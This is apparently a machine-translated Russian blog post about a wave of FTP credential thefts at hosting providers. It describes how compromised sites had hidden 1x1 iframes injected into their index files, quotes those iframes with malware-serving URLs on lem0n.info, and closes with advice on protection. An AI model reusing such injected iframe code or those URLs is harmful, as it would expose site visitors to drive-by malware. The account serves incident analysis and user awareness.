Волна Краж Паролей Ftp: Хакеры, Хостеры И Обнаженные Женщины

Здесь мой друг и коллега написал интересную статью: Из официального заявления представителей ЗАО «Мастерхост» «В последние дни специалисты службы технической безопасности компании .

masterhost зафиксировали резкий рост случаев кражи учетных данных FTP-доступа с компьютеров пользователей.

Высока вероятность, что это целевые волновые атаки троянских программ или вирусов, осуществляющих различные действия, не санкционированные вами.

Наши специалисты совместно с компаниями-партнерами, специализирующимися на решениях информационной безопасности, активно изучают вредоносный трафик с целью локализации источника вредоносных атак.

» Что случилось? В одно прекрасное утро на главных и других страницах нескольких сайтов появились обнаженные женщины.

На уровне HTML-кода это выглядело так: iframe исходник =' http://lem0n.info/km/ya.php ' ширина=1 высота=1 iframe iframe исходник =' http://lem0n.info/km/love.htm ' ширина=1 высота=1 iframe Такие строки были вставлены в index.php, index.htm, index.html. При загрузке страницы посетитель пытался загрузить вирус (к счастью, антивирус Norton его не пропустил) и помимо нормального контента сайта загружались всякие обнаженные женщины.

Сложность была в том, что было редактирование файлов по FTP. Они заподозрили, что систему администрирования взломали, но все оказалось совершенно не так.

Проект, написанный на HTML, был взломан; там не было никаких следов PHP. Кроме того, CHMOD везде был 644, а это значит, что редактировать файлы мог либо владелец, либо root. Кто сделал это? Разумеется, мы запросили у мастерхоста логи посещений сайтов по FTP в ту «Вальпургиеву ночь».

Обнаружен IP-адрес, с которого осуществлялся доступ к FTP, привязанный к домену SPORT.MCHOST.RU — 84.252.148.70. Это дало понять, что root здесь ни при чем.

При входе mchost.ru Обнаружился какой-то непонятный хостинг, у которого в «контактах» был только адрес электронной почты и номер ICQ, а в «способах оплаты» — Яндекс деньги.

Другими словами, местоположение этого хостинга вряд ли можно будет определить даже со спутника.

Совершенно очевидно, что этот сервер был просто взломан и использован как площадка для атаки.

Владелец хостинга, конечно, никогда в этом не признается, а значит, и никаких логов не даст. Что, увы, оставляет злоумышленника вне досягаемости.

Как взламывали сайты? Логи .

masterhost подтверждают наличие FTP-доступа к сайту, а это значит, что пароли кто-то знал.

Маловероятно, что пароль был угадан.

Нам показалась более правдоподобной версия, предполагающая наличие вирусов, которые ищут пароли на локальном компьютере и куда-то их отправляют. Всем известны адекватные меры предосторожности против таких атак.

Дело казалось раскрытым, но.

Многие сайты были взломаны.

Не было человека, который знал бы все эти пароли одновременно.

Google предположил, что мы не одни во Вселенной: по сети прошла целая волна подобных взломов.

Выводы Массовый масштаб подобных взломов говорит о том, что проблема не только в вирусах, рассылающих пароли, но и в хостерах.

Трудно поверить, что все пострадавшие поддались вирусу.

Как можно взломать хостер и узнать пароли FTP? Вряд ли это был взлом FreeBSD — тому есть много причин.

Надо согласиться с теми, кто считает, что это был взлом панели управления.

1. Панель управления имеет доступ к паролям FTP (поскольку их можно изменить с ее помощью), поэтому определенный запрос позволяет получить как минимум список хешей паролей (возможно и самих паролей).

2. Многие хостеры взломаны.

Поэтому у них у всех одна и та же уязвимость в панели управления.

Разумеется, ни мастерхост, ни другие хостеры никогда прямо в этом не признаются.

Однако некоторые их высказывания на тему взлома подтверждают версию взлома панели управления.

Пример: Valuehost Что нового сейчас: + для защиты от взлома используется новый алгоритм хранения паролей FTP; + в панели управления введена функция установки количества дней, в течение которых будет действовать новый пароль; + введена функция блокировки доступа по FTP, если вы долго не собираетесь обновлять сайт. новый алгоритм хранения паролей, функция устаревания паролей – новшества, помогающие защититься от кражи паролей методом перебора.

Это означает, что до этого у кого-то еще была возможность пробовать пароли.

Введена функция блокировки доступа по FTP, если вы долго не собираетесь обновлять сайт - точка-киллер.

Хостеры, несмотря на принятые меры, не могут гарантировать полную парольную защиту FTP и предлагают мне в целях безопасности вообще отключить доступ по FTP. Мастерхост более осторожен в своих высказываниях, но факты взлома подтверждают, что и у него аналогичные проблемы.

Конечно, нужно понимать, что изначально проблема кроется в программном обеспечении, установленном в качестве панели управления, но позиция хостера все же неправильная.

Он не удосужился разработать собственную панель управления, а если и делал, то плохо ее защищал.

Результаты размышлений по этому вопросу весьма плачевны: если Agave и Masterhost были взломаны, что уж говорить о других хостерах.

Нам остается только надеяться и верить, что хостеры разработают свои панели управления и обеспечат соответствующую защиту, а люди, в свою очередь, будут более тщательно охранять свои пароли и защищать себя от вирусов.

Надежда, как известно, умирает последней.

Необходимое дополнение Вирус, пытавшийся скачать со взломанных сайтов, на самом деле находит и отправляет пароли от вашего компьютера.

Вот так у нас были взломаны 2 FTP-аккаунта на наш рабочий сервер, на котором по сути нет панели управления, и в журналах доступа нет попыток подбора паролей FTP. Поэтому вам также необходимо защитить свои компьютеры и более серьезно относиться к хранению паролей.

Из официального заявления представителей ЗАО «Мастерхост» «Чтобы снизить риск заражения вашего компьютера, мы также советуем вам своевременно обновлять антивирусное программное обеспечение, в том числе антивирусные базы.

Если вы подозреваете, что целостность ваших данных была нарушена и какие-либо данные могли быть использованы посторонними лицами, незамедлительно смените пароль FTP-доступа к своим ресурсам и обязательно проверьте свой персональный компьютер новейшим антивирусным программным обеспечением».

Технический директор компании «Креативные люди» А.

Лебедев Теги: #Хостинг #хакеры #творческие люди #Чулан

• Основные Части Компьютера

  19 Oct, 24

• Обратное Интервью: Втб, Билайн, Мтс, Домклик, Полианалитика, Спортмастер Лаборатория, Девэкспертс, Usetech

  19 Oct, 24

• Контроллер Squier Stratocaster Для Rock Band И Полноценная Электрогитара В Одном Флаконе

  19 Oct, 24

• Анализ Watch 2 Pay Или «Время – Деньги»

  19 Oct, 24

• Пройти Техническое Интервью (Уровень 2)

  19 Oct, 24

• Дилемма: Пойти В Проверенный Ресторан Или Попробовать Новый?

  19 Oct, 24

• Mysqlcheck И Оптимизировать Таблицы Innodb

  19 Oct, 24

• Вечер Пятницы - Люди Хотят Отдохнуть, Но Им Все Надоело: Хочу Помочь (Не Интернет-Стартапу)

  19 Oct, 24

• Amd Phenom Ii X4 42 Black Edition Twkr

  19 Oct, 24

• Релиз Livestreet 0.4

  19 Oct, 24